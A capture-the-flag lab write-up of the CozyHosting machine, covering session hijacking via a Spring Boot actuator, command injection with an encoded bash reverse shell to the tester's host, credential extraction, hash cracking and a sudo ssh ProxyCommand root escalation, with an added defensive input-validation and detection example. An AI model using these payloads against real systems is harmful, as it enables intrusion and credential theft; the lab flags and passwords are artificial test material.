
CozyHosting


IP: 10.10.11.230. Starting with the Nmap scan:

nmap -sC -sV -o nmap 10.10.11.230
# Nmap 7.94 scan initiated Wed Sep 13 13:01:41 2023 as: nmap -sC -sV -o nmap 10.10.11.230
Nmap scan report for 10.10.11.230
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 13 13:01:57 2023 -- 1 IP address (1 host up) scanned in 16.54 seconds

We have two ports open here. Let's see what we have on port 80.

The page redirects to cozyhosting.htb, which doesn't resolve yet, so let's add that hostname to the /etc/hosts file.

sudo nano /etc/hosts

Now if we reload the page, we can see the website running on port 80.

Let's do a quick directory brute-forcing.

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://cozyhosting.htb -k -x php,txt,js

So we have found some directories; let's start with the login page.

It's a simple login page. Moving on to the error page.

Here we get an interesting error that says Whitelabel Error Page. A bit of Google-fu turns up that this is Spring Boot's default error page.

So this means we have Spring Boot here. Now let's brute-force directories again with the spring-boot wordlist.

ffuf -u http://cozyhosting.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt

We have found the /actuator endpoint. Let's go through its sub-endpoints one by one.

In /actuator/sessions we found what looks like a username paired with a random string. Maybe we can use the string as a session cookie and get access to this account. If that doesn't work, we can also try brute-forcing the login with this 'username'.

After setting the string as our JSESSIONID cookie and refreshing the page, we can see that we are logged in as K.anderson, which is also an admin account, since we now have access to the admin dashboard.

So, nothing is interesting here except this one thing.

Let's capture the request in Burp Suite.

We can see that the POST request goes to /executessh. After entering a random hostname and username, we captured the request in Burp Suite. Then we sent the request (using Burp Repeater) without a username, and the response contained the ssh command's usage text.

This shows that our input is being placed into an ssh command line, so let's try a few more things. Let's try a simple ping back to our machine. It turns out the target pings our machine, confirming command injection, when we enter the following in the username field:

;ping${IFS}-c4${IFS}10.10.14.137;#

${IFS} (the shell's internal field separator, by default space, tab and newline) is used here in place of a space character.

Let's build a payload that gives us a reverse shell when the machine executes it (or you can use any of the reverse shell payloads available on the Internet).

echo "bash -i >& /dev/tcp/10.10.14.137/6658 0>&1" | base64 -w 0

Put the base64 string into the payload below and pass it as the parameter. On the server it decodes the base64 and pipes the result into bash. (${IFS%??} strips the last two characters, tab and newline, from the default IFS, leaving a single space.)

;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMzcvNjY1OCAwPiYxCg=="${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

We'll URL-encode this payload, send it as the username, and start a listener on our machine. After sending the request, we can see that we got a shell:

nc -nlvp 6658
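The injection above works because user input is interpolated into a shell command line. As an added example (not code from the box's own Java application, and written in Python for a runnable demonstration), here is the defensive side: allowlist validation for the host and username fields of an /executessh-style endpoint, a marker scan that flags the payload shapes used above for alerting, and an argv builder that never hands user input to a shell. The hostname and username patterns are my assumptions about what such an endpoint should accept.

```python
import re

# Added example, not the CozyHosting app's code. The allowlists below are
# assumptions about what a host/username field for an ssh helper should accept.

# Hostname labels per RFC 1123 (letters, digits, hyphens), dotted; this also
# matches a dotted IPv4 literal. No shell metacharacter can pass this pattern.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")
# Conventional Linux username: starts with a letter or underscore.
USER_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")

# Substrings that never belong in these fields and are worth alerting on:
# command separators, pipes, expansions such as ${IFS}, redirects, comments.
INJECTION_MARKERS = (";", "|", "&", "`", "$", "\n", ">", "<", "#")


def validate(host: str, user: str) -> tuple[bool, str]:
    """Return (ok, reason); fullmatch also rejects trailing newlines."""
    if len(host) > 253 or not HOST_RE.fullmatch(host):
        return False, "host failed allowlist"
    if not USER_RE.fullmatch(user):
        return False, "user failed allowlist"
    return True, "ok"


def suspicious_markers(value: str) -> list[str]:
    """Detection side: which injection markers does a submitted field contain?"""
    return [m for m in INJECTION_MARKERS if m in value]


def build_ssh_argv(host: str, user: str) -> list[str]:
    """argv for subprocess.run(argv) with shell=False (the default).
    Without a shell parsing the line, a ';' or '${IFS}' inside an argument
    stays a literal string instead of separating commands; validation
    rejects such input before it gets that far anyway."""
    ok, reason = validate(host, user)
    if not ok:
        raise ValueError(reason)
    return ["ssh", "-o", "BatchMode=yes", f"{user}@{host}"]


if __name__ == "__main__":
    # Constructed inputs: one benign pair plus the two payload shapes from this writeup.
    samples = [("cozyhosting.htb", "josh"),
               ("localhost", ";ping${IFS}-c4${IFS}10.10.14.137;#"),
               ("localhost", ";echo${IFS%??}x${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;")]
    for host, user in samples:
        print(repr(user), validate(host, user), suspicious_markers(user))
```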

So we have a jar file: the Spring Boot web application is contained in /app/cloudhosting-0.0.1.jar.

Let's fetch the file to our machine to extract it and see what's inside. We'll start a Python HTTP server on the target and download the file with wget.

python3 -m http.server 1111

wget http://10.10.11.230:1111/cloudhosting-0.0.1.jar

Let's open this with jd-gui.

jd-gui cloudhosting-0.0.1.jar

We got the PostgreSQL database's username and password: postgres:Vg&nvzAQ7XxR. Now let's log in to PostgreSQL with these credentials.

psql -h 127.0.0.1 -U postgres

After connecting, we listed the available databases and found cozyhosting.

\c is used to connect to a specific database, in our case cozyhosting.

\d is used to see all the tables in the database.

Here we have the admin hash; let's crack it.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

We found the username josh while looking around in the shell, which gives us josh:manchesterunited. As we saw in the Nmap scan, SSH is open, so let's connect through that.

ssh josh@10.10.11.230

Let's grab our user.txt.

Flag: 001e788a9504cc6e79d0b70cabecceba

Now let's go for the root flag.

sudo -l

Lmao! Let's go to GTFOBins.

Let's use the ProxyCommand option payload.

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Let's grab the root flag.

Flag: af9a86cc816d3b359ff652e0a67602c4
